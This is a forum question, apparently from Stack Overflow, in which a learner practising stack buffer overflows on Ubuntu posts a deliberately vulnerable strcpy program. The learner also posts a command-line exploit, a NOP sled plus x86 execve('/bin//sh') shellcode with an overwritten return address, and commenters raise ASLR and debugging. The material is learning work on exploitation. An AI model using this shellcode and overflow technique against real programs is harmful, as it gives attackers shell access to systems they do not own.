# Buffer overflow does not work well in ubuntu

Tags: ubuntu, assembly, buffer-overflow

When I practiced bof(buffer overflow) in ubuntu, I found weird things.

I used this code. (test.c compiled file is "test")

```
#include <stdio.h>

int main(int argc, char* argv[])
{
char buffer[256];
strcpy(buffer, argv[1]);
printf("%s\n",buffer);
return0;
}
```

I debugged it. and character buffer starts 0xffffd57c.
so I write this.

```
qwe@ubuntu:~/Document$ test $(python -c 'print "\x90"*237 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x7c\xd5\xff\xff"')
```

but it does not work.

weird thing is this code works below.

```
qwe@ubuntu:~/Document$ test $(python -c 'print "\x90"*237 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x94\xd7\xff\xff"')
```

0xffffd794 is far from the beginning address of buffer(0xffffd57c), even more than the size of nop landing pad.

I dont know why this happen and I want to know.

Comment: What do you mean "works"?  Are you sure you're not just running the `test` shell build-in command, and also available as `/usr/bin/test`?  (synonym for `[`).  See [the `test(1)` man page](http://man7.org/linux/man-pages/man1/test.1.html).  You need to run `./test` (i.e. an explicit path) if you want to override the shell's normal command-processing and checking of $PATH (which doesn't normally include `.`)

Comment: I am sure I run my test. I am sorry for writing wrong. I shuld write ./test blabla.  I mean that getting shell with bof works on wrong offset(ffffd794) i think.

Comment: Did you disable ASLR?  If not, different runs will have stack variables at different addresses.  What happens when you single-step through your exploit in the debugger?  You should see exactly what happens.